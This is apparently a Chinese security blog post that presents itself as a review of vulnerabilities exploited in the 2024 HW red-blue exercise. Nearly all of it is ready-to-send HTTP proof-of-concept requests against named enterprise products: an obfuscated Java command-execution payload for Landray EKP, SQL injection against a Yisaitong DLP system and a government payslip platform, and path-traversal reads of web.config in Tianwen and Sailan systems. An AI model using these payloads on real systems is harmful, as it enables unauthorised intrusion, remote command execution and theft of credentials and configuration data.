护网行动2024漏洞复盘:这些”0day漏洞”为何让企业一夜崩盘?
护网行动2024漏洞复盘:这些”0day漏洞”为何让企业一夜崩盘?
是傲 安小圈 2025-04-27 00:45
声明:无恶意引导,漏洞信息以及poc网上均已公开,此文章进行漏洞资源整合复盘,仅供师傅们参考。
【前言】
小伙伴们一年一度的护网攻防即将开始,你们的实力提升如何了?是不是又在幻想要打穿哪家企业了?那就让蓝方工程师尝尝你们新的“绝招”吧。
在2024年护网攻防演练的硝烟散尽后,一组数据令人心惊:超过60%的企业靶标在24小时内被攻破,而攻击者最常用的武器竟是3个已公开修复的’旧漏洞’。
去年护网行动中,攻击者展现出前所未有的技术协同能力——从云原生架构的权限逃逸,到AI生成的钓鱼代码混淆检测,再到供应链漏洞的精准投毒,网络安全防线正面临多维度的撕裂。
本文结合一些实战案例,深度拆解2024年护网行动中高频出现的十大高危漏洞,揭露黑产团伙如何将漏洞武器化形成完整攻击链,并为企业的常态化防御提供关键决策参考。下一场攻防战来临前,你的安全水位线达标了吗?
【以下是一些已公开的系统漏洞和一些漏洞poc】
一、蓝凌EKP存在sys_ui_component远程命令执行漏洞
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host:
Accept:application/json,text/javascript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
User
Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.
0.4103.116Safari/537.36
X-Requested-With:XMLHttpRequest
Content-Length: 395
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="method"
replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51-
poc2
POST /resource/help/km/review/dataxml.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Cmd: echo stctest
s_bean=ruleFormulaValidate&script=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u006
5\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u
0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u006
7\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u
0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u002
9\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u
0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u007
2\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u
0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u006
1\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u
0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u006
4\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u
0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u007
2\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u
003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002
e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u
0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u002
0\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u
0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u002
0\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u
0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u007
4\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u
006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u006
7\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u
006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006
f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u
0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u006
9\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u
0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u002
0\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u
0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u006
4\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u
0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u007
2\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u
0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u002
0\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u
0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u002
0\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u
0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u007
3\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u
0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u002
9\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u
006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u002
0\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u
0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u004
3\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u
0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u006
4\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u
0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u007
8\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u
0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u007
3\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u
0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006
c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u
0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006
c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u
0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003
b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u
006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u006
2\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u
0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002
e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u
006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007
d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u
0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u002
0\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u
0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u006
5\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u
006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u007
4\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u
0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u002
8\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u
0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u006
5\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u
0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u007
3\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u
0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002
e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u
0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002
e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u
0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006
a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u
0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u002
0\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u
0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006
f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u
003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002
e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u
0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u002
2\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u
0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004
f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u
0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003
b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u
0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002
e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u
0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u002
0\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u
006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006
a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u
0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u006
5\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u
0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u007
2\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u
007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u002
9\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u
0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0043\u006
d\u0064\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u
003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002
e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u
0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002
e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u
0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006
c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u
0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u007
0\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u
007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u003
0\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u
0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u006
7\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u
002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u007
2\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u
0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006
e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u
006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u002
0\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u
0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u002
2\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u
0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u006
1\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u
0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006
e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u
0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u002
8\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u
0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u007
4\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u
0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u006
1\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u
0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u007
3\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u
0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u006
3\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u
0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005
c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u
0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u006
1\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u
0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u002
0\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u
0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u002
2\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u
0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u002
0\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u
0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u002
2\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u
0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u007
9\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u
003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006
e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u
0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u007
3\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u
0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002
e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u
0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u002
9\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u
0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u007
3\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u
0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u006
5\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u
0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u007
4\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u
0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u002
0\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u
0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u007
0\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u
007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u006
8\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u
0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u002
9\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u
0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u002
8\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u
0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u002
0\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u
0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002
c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u
0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u006
9\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u
0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006
c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u
0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u006
4\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u
0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u002
9\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u
006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u006
2\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u
0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u002
9\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u
0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u006
1\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u
0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u002
0\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d&modelNa
me=test
二、亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host:
Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917;
JSESSIONID=06DCD58EDC037F785605A29CD7425C66
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/124.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
command=delNotice¬iceId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR
DELAY '0:0: 3' --
三、天问物业ERP系统AreaAvatarDownLoad存在任意文件读取漏洞
GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
四、赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞
GET /BaseModule/SysLog/ReadTxtLog?FileName=../web.config HTTP/1.1
Host:
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie:
__RequestVerificationToken=EXiOGTuudShJEzYLR8AQgWCZbF2NB6_KXKrmqJJyp1cgyV6_LYy9yKQhNkHJ
GXXlbO_6NLQZPwUUdVZKH6e9KMuXyxV6Tg-w5Ftx-mKih3U1;
ASP.NET_SessionId=2ofwed0gd2jc4paj0an0hpcl
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101
Firefox/128.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,i
mage/svg+xml,*/*;q=0.8
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
五、赛蓝企业管理系统GetJSFile存在任意文件读取漏洞
GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
六、数字通指尖云平台-智慧政务payslip SQL注入漏洞
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050
FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as
nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101
Firefox/117.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: GOASESSID=i589f58naalabocmbidup7edl3
